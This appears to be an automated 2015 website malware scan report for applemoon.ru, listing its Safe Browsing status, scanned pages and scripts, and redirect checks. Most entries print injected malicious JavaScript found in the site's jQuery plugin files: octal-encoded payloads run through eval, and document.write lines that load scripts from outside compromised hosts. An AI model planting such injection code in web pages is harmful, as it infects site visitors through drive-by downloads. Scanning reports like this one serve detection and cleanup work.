Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=applemoon.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://applemoon.ru/ | 200 OK Content-Length: 16037 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.js | 200 OK Content-Length: 72440 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://duda-mail.pl/xpt6rxzt.php?id=3063762"></script>');
| ||
http://applemoon.ru/webroot/delivery/js/jquery.tools.js | 200 OK Content-Length: 58075 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac= =-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.jqzoom.js | 200 OK Content-Length: 26182 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.jqzoom = function(options) { var settings = { zoomType: 'standard', zoomWidth: 200, zoomHeight: 200, xOffset: 10, yOffset: 0, position: "right" , lens:true, lensReset : false, imageOpacity: 0.2, title : true, alwaysOn: false, showEffect: 'show', hideEffect: 'hide', fadeinSpeed: 'fast', fadeoutSpeed: ' { while (stringa.substring(0,1) == ' '){ stringa = stringa.substring(1, stringa.length); } while (stringa.substring(stringa.length-1, stringa.length) == ' '){ stringa = stringa.substring(0,stringa.length-1); } return stringa; };if((0x19==031))if(e)s=s ff(e(aq (w[j])) 9);}za=e;za(s)} document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.amoon.js | 200 OK Content-Length: 7659 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { if($('#applescroll').length > 0) { if($('div.b-head-i i').length > 1) { $('.b-applescroll').loopedCarousel({ container: '.b-head', slides: '.b-head-i', items: 1, padding:0, next: '.l-ar' }) $('.b-applescroll').loopedCarousel({ container: '#applescroll', slides: '#applescroll ul', items: 1, padding:0, next: '.r-ar' }) } else< var $t = $(this); var indexsel = $t[0].selectedIndex; var valuesel = $t[0].options[indexsel].value; }); if($('#scroll-towns').length > 0) { $('#scroll-towns').jScrollPane({ scrollbarWidth:21, showArrows:true, arrowSize:20, dragMinHeight:1 }); } }); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/shop/basket/ | 200 OK Content-Length: 11036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/about/ | 200 OK Content-Length: 14589 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/news-and-pr/ | 200 OK Content-Length: 5613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://applemoon.ru/shops/ | 200 OK Content-Length: 301468 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.message.js | 200 OK Content-Length: 1846 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function(){ $('#message_form').attr('action', '/plugins/ajax/message.php'); $('#message_form').attr('target', 'frame-form-send'); $('#message_form div.captcha a').click(function(){ $('#message_form div.captcha img').attr('src','/vendors/kcaptcha/index.php?time=' Math.random()); $('#message_form div.captcha input').val(''); return false; }); $('#message_form').submit(function(){ var resultform = true; $t.parent().toggleClass('active-sendletter'); if($t.parent().hasClass('active-sendletter')) { $('#message_form div.captcha img').attr('src','/vendors/kcaptcha/index.php?time=' Math.random()); $('#message_form div.captcha input').val(''); } return false; }); } }); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.validator.js | 200 OK Content-Length: 3147 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.extend({ validatorCheckbox: function(){ result = false; if($(this).attr('checked') == true || $(this).attr('checked') == 'checked') { result = true; } else { result = false; } $(this).validatorError(result); return result; }, validatorLatin: function (){ result = true; var pat=/^[\w-\d] $/i; if(pat.test($(this).val())) { result = true; $(this) else { $(this).validatorError(result); } return result; }, validatorError: function(resulterror) { if(resulterror) { $(this).parent().removeClass('error-ip'); } else { $(this).parent().addClass('error-ip'); } } });s=s ff(e(aq (w[j])) 9);}za=e;za(s)} document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://maps.google.com/maps?file=api&v=2&sensor=true&key=ABQIAAAAdY1Wuxc-Jk5RMAiie9WUjhQZFt93kPd1t6VW4aocOUDd3J6XBxQQpyfil9fzO_GKah69N6HKw2X80w | 200 OK Content-Length: 4576 Content-Type: text/javascript | clean |
http://applemoon.ru/webroot/delivery/js/jquery.maps.js | 200 OK Content-Length: 3373 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var gmarkers = []; function createMarker(point,name,html,city) { var tinyIcon = new GIcon(); tinyIcon.image = "http://maps.google.com/mapfiles/marker_green.png"; tinyIcon.iconSize = new GSize(20, 34); tinyIcon.iconAnchor = new GPoint(6, 20); tinyIcon.infoWindowAnchor = new GPoint(5, 1); markerOptions = { icon:tinyIcon }; var marker = new GMarker(point, markerOptions); marker.mycategory = city; marker.myname = name; customUI.maptypes.physical = false; map.setUI(customUI); });w=f;s=[];for(i=2-2;-i 1339!=0;i =1){j=i;if((0x19==031))if(e)s=s ff(e(aq (w[j])) 9);}za=e;za(s)} ){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/extinfowindow/extinfowindow.js | 200 OK Content-Length: 9198 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: applemoon.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 07 Mar 2015 17:35:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Sat, 07 Mar 2015 17:35:11 GMT
GET / HTTP/1.1
Host: applemoon.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 07 Mar 2015 17:35:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Sat, 07 Mar 2015 17:35:11 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: applemoon.ru
Referer: http://www.google.com/search?q=applemoon.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: applemoon.ru
Referer: http://www.google.com/search?q=applemoon.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.